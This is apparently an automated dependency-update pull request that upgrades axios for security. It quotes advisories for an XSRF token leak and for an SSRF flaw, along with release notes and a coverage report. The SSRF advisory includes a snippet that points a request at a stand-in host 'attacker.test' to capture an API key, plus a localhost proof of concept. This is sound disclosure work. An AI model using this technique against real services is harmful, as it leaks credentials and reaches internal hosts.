fix(deps): update dependency axios to ^0.30.0 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
axios (source)	^0.28.0 -> ^0.30.0

GitHub Vulnerability Alerts

CVE-2023-45857

An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.

CVE-2025-27152

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

• When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
• Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

1. Set up two simple HTTP servers:

mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &

2. Create a script (e.g., main.js):

import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);

3. Run the script:

$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

• Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
• SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
• Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

---

Release Notes

axios/axios (axios)

v0.30.0

Compare Source

Release notes:

Bug Fixes

• fix: modify log while request is aborted by @​mori5321 in #​4917
• fix: update CHANGELOG.md for v0.x by @​TehZarathustra in #​6271
• fix: modify upgrade guide for 0.28.1's breaking change by @​nafeger in #​6787
• fix: backport allowAbsoluteUrls vulnerability fix to v0.x by @​thatguyinabeanie in #​6829
• fix: add allowAbsoluteUrls type by @​thatguyinabeanie in #​6849

Contributors to this release

• @​mori5321 made their first contribution in #​4917
• @​TehZarathustra made their first contribution in #​6271
• @​nafeger made their first contribution in #​6787
• @​thatguyinabeanie made their first contribution in #​6829

Full Changelog: axios/axios@v0.29.0...v0.30.0

v0.29.0

Compare Source

Release notes:

Bug Fixes

• fix(backport): backport security fixes in commits #​6167 and #​6163 to v0.x by @​Sean-Powell in #​6402
• fix: omit nulls in params by @​Willshaw in #​6394
• fix(backport): fix paramsSerializer function validation by @​solonzhu in #​6361
• fix: Regular Expression Denial of Service (ReDoS) by @​qiongshusheng in #​6708

Contributors to this release

• @​Sean-Powell made their first contribution in #​6402
• @​Willshaw made their first contribution in #​6394
• @​solonzhu made their first contribution in #​6361
• @​qiongshusheng made their first contribution in #​6708

---

Configuration

📅 Schedule: Branch creation - "" in timezone America/New_York, Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 100.00%. Comparing base (f438360) to head (dae84c7).

Additional details and impacted files

@@            Coverage Diff            @@
##            master      #407   +/-   ##
=========================================
  Coverage   100.00%   100.00%           
=========================================
  Files          107       107           
  Lines         1086      1086           
  Branches       159       160    +1     
=========================================
  Hits          1086      1086           

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
• 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.